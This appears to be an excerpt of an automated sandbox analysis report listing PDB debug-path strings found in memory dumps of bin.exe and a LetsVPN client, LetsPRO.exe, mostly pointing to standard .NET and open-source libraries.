                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.ReaderWriter\4.1.1.0\System.Xml.ReaderWriter.pdb source: bin.exe, 00000017.00000003.1640720262.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Pkcs/net461-windows-Release/System.Security.Cryptography.Pkcs.pdbSHA256 source: bin.exe, 00000017.00000003.1618601938.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Tasks.Parallel\4.0.1.0\System.Threading.Tasks.Parallel.pdb source: bin.exe, 00000017.00000003.1632215391.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/CommunityToolkit.Mvvm/obj/Release/netstandard2.0/CommunityToolkit.Mvvm.pdbSHA256 source: bin.exe, 00000017.00000003.1510230437.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Web.Services.Description/Release/net461/System.Web.Services.Description.pdbSHA256aP source: bin.exe, 00000017.00000003.1639573458.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets.Client\4.0.2.0\System.Net.WebSockets.Client.pdb source: bin.exe, 00000017.00000003.1598303869.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdb source: bin.exe, 00000017.00000003.1531546889.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceProcess.ServiceController/net461-windows-Release/System.ServiceProcess.ServiceController.pdb source: bin.exe, 00000017.00000003.1627316997.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdbSHA256 source: bin.exe, 00000017.00000003.1577950171.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem\4.0.3.0\System.IO.FileSystem.pdb source: bin.exe, 00000017.00000003.1580441083.000000000273A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdbL source: bin.exe, 00000017.00000003.1549496484.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Mono.Cecil.Pdb.dll source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\Microsoft.Expression.Interactions\Win32\Release\Microsoft.Expression.Interactions.pdb source: bin.exe, 00000017.00000003.1532987225.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.OleDb/net461-windows-Release/System.Data.OleDb.pdb source: bin.exe, 00000017.00000003.1565142472.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry.AccessControl/net461-windows-Release/Microsoft.Win32.Registry.AccessControl.pdbSHA256a? source: bin.exe, 00000017.00000003.1536976844.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb source: bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890076416.0000000005C72000.00000002.00000001.01000000.0000001D.sdmp
                Source: Binary string: e:\ExpressionRTM\Sparkle\SDK\BlendWPFSDK\Build\Intermediate\Release\Libraries\System.Windows.Interactivity\Win32\Release\System.Windows.Interactivity.pdb source: bin.exe, 00000017.00000003.1640216842.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel\4.0.1.0\System.ComponentModel.pdb source: bin.exe, 00000017.00000003.1561840053.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Handles\4.0.1.0\System.Runtime.Handles.pdb source: bin.exe, 00000017.00000003.1606248215.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Primitives.Facade/Release/net461/System.ServiceModel.Primitives.pdbSHA256a3 source: bin.exe, 00000017.00000003.1625556136.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdbSHA256K source: bin.exe, 00000017.00000003.1628247172.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\webview2_api_writer\dotNetAPIWrapper\Microsoft.Web.WebView2.Core\bin\ReleasePackage\Microsoft.Web.WebView2.Core.pdb source: bin.exe, 00000017.00000003.1534392709.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.AccessControl/net461-windows-Release/System.Security.AccessControl.pdbSHA256 source: bin.exe, 00000017.00000003.1614739993.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Numerics.Vectors/net46\System.Numerics.Vectors.pdb source: bin.exe, 00000017.00000003.1599554048.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdb source: bin.exe, 00000017.00000003.1586338671.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Data.Odbc/net461-windows-Release/System.Data.Odbc.pdbSHA256x source: bin.exe, 00000017.00000003.1564522155.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdb source: bin.exe, 00000017.00000003.1539910501.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdbH,b, T,_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1595737967.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdb source: bin.exe, 00000017.00000003.1619977368.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdbSHA256 source: bin.exe, 00000017.00000003.1626199430.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Security.SecureString/netfx\System.Security.SecureString.pdb source: bin.exe, 00000017.00000003.1623511501.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb source: bin.exe, 00000017.00000003.1585838723.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.Ports/net461-windows-Release/System.IO.Ports.pdb source: bin.exe, 00000017.00000003.1586870010.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XDocument\4.0.11.0\System.Xml.XDocument.pdb source: bin.exe, 00000017.00000003.1641195155.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdbd+~+ p+_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1560411692.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\rocks\obj\Release\net40\Mono.Cecil.Rocks.pdbSHA256 source: bin.exe, 00000017.00000003.1539910501.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Dynamic.Runtime\4.0.11.0\System.Dynamic.Runtime.pdb source: bin.exe, 00000017.00000003.1574111221.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdbSHA256Uu source: bin.exe, 00000017.00000003.1626865159.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading\4.0.11.0\System.Threading.pdb source: bin.exe, 00000017.00000003.1638461725.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Compression.ZipFile\4.0.3.0\System.IO.Compression.ZipFile.pdb source: bin.exe, 00000017.00000003.1576354512.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: bin.exe, 00000017.00000003.1541597025.0000000002734000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890859307.0000000005F22000.00000002.00000001.01000000.0000001E.sdmp
                Source: Binary string: /_/artifacts/obj/System.Threading.AccessControl/net461-windows-Release/System.Threading.AccessControl.pdb source: bin.exe, 00000017.00000003.1630497195.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.FileVersionInfo\4.0.2.0\System.Diagnostics.FileVersionInfo.pdb source: bin.exe, 00000017.00000003.1568304896.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebHeaderCollection\4.0.1.0\System.Net.WebHeaderCollection.pdb source: bin.exe, 00000017.00000003.1597771215.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Text.Encoding.Extensions\4.0.11.0\System.Text.Encoding.Extensions.pdb source: bin.exe, 00000017.00000003.1628787314.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdb source: bin.exe, 00000017.00000003.1604218262.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdbSHA256 source: bin.exe, 00000017.00000003.1548032073.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.Specialized\4.0.3.0\System.Collections.Specialized.pdb source: bin.exe, 00000017.00000003.1557388355.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\vendor\nuget\src\Core\obj\Release\NuGet.Squirrel.pdb source: bin.exe, 00000017.00000003.1542970100.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\MdXaml\artifacts\obj\MdXaml\Release\net45\MdXaml.pdb source: bin.exe, 00000017.00000003.1527350811.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Mono.Cecil.PdbG source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\PowerShellStandard\src\5\obj\Release\net452\System.Management.Automation.pdbSHA2569v'` source: bin.exe, 00000017.00000003.1591734252.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections.NonGeneric\4.0.3.0\System.Collections.NonGeneric.pdb source: bin.exe, 00000017.00000003.1553986968.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdbSHA256 source: bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\WorkShop\SuperSocket.ClientEngine\obj\Release\SuperSocket.ClientEngine.pdb source: bin.exe, 00000017.00000003.1551101243.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdbSHA256 source: bin.exe, 00000017.00000003.1537619804.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdb source: bin.exe, 00000017.00000003.1533776691.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: OriginalFilenameMono.Cecil.Pdb.dll6 source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.MsDelta\obj\Release\DeltaCompressionDotNet.MsDelta.pdb source: bin.exe, 00000017.00000003.1510836959.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdbSHA256 source: bin.exe, 00000017.00000003.1538114528.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: bin.exe, 00000017.00000003.1546714965.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Permissions/net461-windows-Release/System.Security.Permissions.pdb source: bin.exe, 00000017.00000003.1621744394.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.ComponentModel.Annotations/netfx\System.ComponentModel.Annotations.pdb source: bin.exe, 00000017.00000003.1558973587.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Primitives\4.0.11.0\System.Net.Primitives.pdb source: bin.exe, 00000017.00000003.1595737967.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.Watcher\4.0.2.0\System.IO.FileSystem.Watcher.pdb source: bin.exe, 00000017.00000003.1579812131.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.nativelibrary\obj\Release\netstandard2.0\SQLitePCLRaw.nativelibrary.pdb source: bin.exe, 00000017.00000003.1547368330.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin\obj\Windows_NT.AnyCPU.Release\System.Runtime.InteropServices.RuntimeInformation\net462\System.Runtime.InteropServices.RuntimeInformation.pdb source: bin.exe, 00000017.00000003.1607032792.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\LetsVPN\obj\Release\LetsPRO.pdb source: bin.exe, 00000017.00000003.1524518889.0000000002738000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000000.1873659229.0000000000F32000.00000002.00000001.01000000.00000019.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Reader\4.0.2.0\System.Resources.Reader.pdb source: bin.exe, 00000017.00000003.1602379822.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Xml/net461-windows-Release/System.Security.Cryptography.Xml.pdb source: bin.exe, 00000017.00000003.1621198141.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: c:\Users\Todd\Source\Repos\DeltaCompressionDotNet\DeltaCompressionDotNet.PatchApi\obj\Release\DeltaCompressionDotNet.PatchApi.pdb source: bin.exe, 00000017.00000003.1511520441.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdb source: bin.exe, 00000017.00000003.1540649267.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection\4.1.2.0\System.Reflection.pdb source: bin.exe, 00000017.00000003.1601628106.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.NetTcp.Facade/Release/net461/System.ServiceModel.NetTcp.pdb source: bin.exe, 00000017.00000003.1625012758.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\x64\e_sqlite3.pdb source: bin.exe, 00000017.00000003.1675152346.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdbon source: bin.exe, 00000017.00000003.1535471188.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Encoding\4.0.2.0\System.Security.Cryptography.Encoding.pdb source: bin.exe, 00000017.00000003.1617972564.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.ServiceModel.Duplex.Facade/Release/net461/System.ServiceModel.Duplex.pdbSHA256 source: bin.exe, 00000017.00000003.1624001905.0000000002731000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: bin.exe, 00000017.00000003.1545901293.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb source: bin.exe, 00000017.00000003.1570344266.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb'MAM 3M_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1572509011.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: FileDescriptionMono.Cecil.Pdb2 source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.batteries_v2.e_sqlite3.dynamic\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256 source: bin.exe, 00000017.00000003.1545901293.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Debug\4.0.11.0\System.Diagnostics.Debug.pdb source: bin.exe, 00000017.00000003.1566880284.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\Mannelig\Dev\Projects\NET\WpfToastNotifications\Src\ToastNotifications\obj\Release\ToastNotifications.pdb source: bin.exe, 00000017.00000003.1644794214.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\SDK\AppCenterCrashes\Microsoft.AppCenter.Crashes.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.Crashes.pdb source: bin.exe, 00000017.00000003.1531102979.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdbSHA256 source: bin.exe, 00000017.00000003.1573124674.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: bin.exe, 00000017.00000003.1512955071.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Cryptography.Csp\4.0.2.0\System.Security.Cryptography.Csp.pdb4)N) @)_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1617348748.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\GitWorkspace\AvalonEdit\ICSharpCode.AvalonEdit\obj\Release\net45\ICSharpCode.AvalonEdit.pdb source: bin.exe, 00000017.00000003.1514589581.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\third_party\edge_webview2\win\winforms_control\Microsoft.Web.WebView2.WinForms\obj\release\net45\Microsoft.Web.WebView2.WinForms.pdb source: bin.exe, 00000017.00000003.1534928087.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: Microsoft.Cci.Pdb source: bin.exe, 00000017.00000003.1539281217.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.Pipes\4.0.2.0\System.IO.Pipes.pdbh) source: bin.exe, 00000017.00000003.1586338671.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Text.Encoding.CodePages/net461-windows-Release/System.Text.Encoding.CodePages.pdb source: bin.exe, 00000017.00000003.1628247172.000000000273B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Security\4.0.2.0\System.Net.Security.pdbT*n* `*_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1596763609.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\cb\bld\bin\e_sqlite3\win\v141\plain\arm\e_sqlite3.pdb source: bin.exe, 00000017.00000003.1673429546.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.ThreadPool\4.0.12.0\System.Threading.ThreadPool.pdb source: bin.exe, 00000017.00000003.1634271910.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\Microsoft.Win32.Primitives\4.0.3.0\Microsoft.Win32.Primitives.pdb|( source: bin.exe, 00000017.00000003.1536326659.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\IEUser\pusher-websocket-dotnet\PusherClient\obj\release\net46\PusherClient.pdb source: bin.exe, 00000017.00000003.1543633291.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\StubExecutable.pdb source: bin.exe, 00000017.00000003.1509476332.0000000002739000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.1884979889.0000000000B4D000.00000002.00000001.01000000.00000018.sdmp, LetsPRO.exe, 00000036.00000000.1873262546.0000000000B4D000.00000002.00000001.01000000.00000018.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.Tools\4.0.1.0\System.Diagnostics.Tools.pdb source: bin.exe, 00000017.00000003.1571632346.0000000002733000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.IO.Packaging/net461-Release/System.IO.Packaging.pdb source: bin.exe, 00000017.00000003.1585292674.0000000002736000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Threading.Overlapped/netfx\System.Threading.Overlapped.pdb source: bin.exe, 00000017.00000003.1631006621.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\a\1\s\LetsVPNDomainModel\obj\Release\LetsVPNDomainModel.pdb+CEC 7C_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1526004795.0000000002733000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000037.00000002.1890076416.0000000005C72000.00000002.00000001.01000000.0000001D.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Win32.Registry/net461-Windows_NT-Release/Microsoft.Win32.Registry.pdb source: bin.exe, 00000017.00000003.1537619804.0000000002739000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Xml/netfx\System.Runtime.Serialization.Xml.pdb source: bin.exe, 00000017.00000003.1613581369.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization\4.0.11.0\System.Globalization.pdb source: bin.exe, 00000017.00000003.1575833413.0000000002738000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XmlSerializer\4.0.11.0\System.Xml.XmlSerializer.pdbt+ source: bin.exe, 00000017.00000003.1643180881.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.NameResolution\4.0.2.0\System.Net.NameResolution.pdb|( source: bin.exe, 00000017.00000003.1594016654.000000000273C000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdb source: bin.exe, 00000017.00000003.1637794932.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Security.Cryptography.Algorithms/netfx\System.Security.Cryptography.Algorithms.pdb source: bin.exe, 00000017.00000003.1616190581.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Linq.Parallel\4.0.1.0\System.Linq.Parallel.pdb source: bin.exe, 00000017.00000003.1589652681.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\eric\dev\SQLitePCL.raw\src\SQLitePCLRaw.provider.dynamic_cdecl\obj\Release\netstandard2.0\SQLitePCLRaw.provider.dynamic_cdecl.pdb source: bin.exe, 00000017.00000003.1548032073.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.Primitives\4.1.2.0\System.ComponentModel.Primitives.pdb source: bin.exe, 00000017.00000003.1560411692.0000000002735000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/net461-Release/Microsoft.Bcl.AsyncInterfaces.pdb source: bin.exe, 00000017.00000003.1532085148.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/net461-windows-Release/System.Security.Cryptography.ProtectedData.pdbSHA256 source: bin.exe, 00000017.00000003.1619977368.0000000002737000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Xml.XPath\4.0.3.0\System.Xml.XPath.pdb source: bin.exe, 00000017.00000003.1642153652.000000000273E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\projects\sharpcompress\src\SharpCompress\obj\Release\net45\SharpCompress.pdb source: bin.exe, 00000017.00000003.1549496484.0000000002734000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdb source: bin.exe, 00000017.00000003.1550365235.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.CompilerServices.VisualC\4.0.2.0\System.Runtime.CompilerServices.VisualC.pdb@*Z* L*_CorDllMainmscoree.dll source: bin.exe, 00000017.00000003.1604889904.0000000002732000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Runtime.Serialization.Primitives/netfx\System.Runtime.Serialization.Primitives.pdb source: bin.exe, 00000017.00000003.1612912138.000000000526F000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Security.Principal\4.0.1.0\System.Security.Principal.pdb source: bin.exe, 00000017.00000003.1622971525.000000000273D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Diagnostics.Tracing/netfx\System.Diagnostics.Tracing.pdb source: bin.exe, 00000017.00000003.1572509011.0000000002730000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime\4.1.2.0\System.Runtime.pdb source: bin.exe, 00000017.00000003.1614187153.0000000002731000.00000004.00000020.00020000.00000000.sdmp
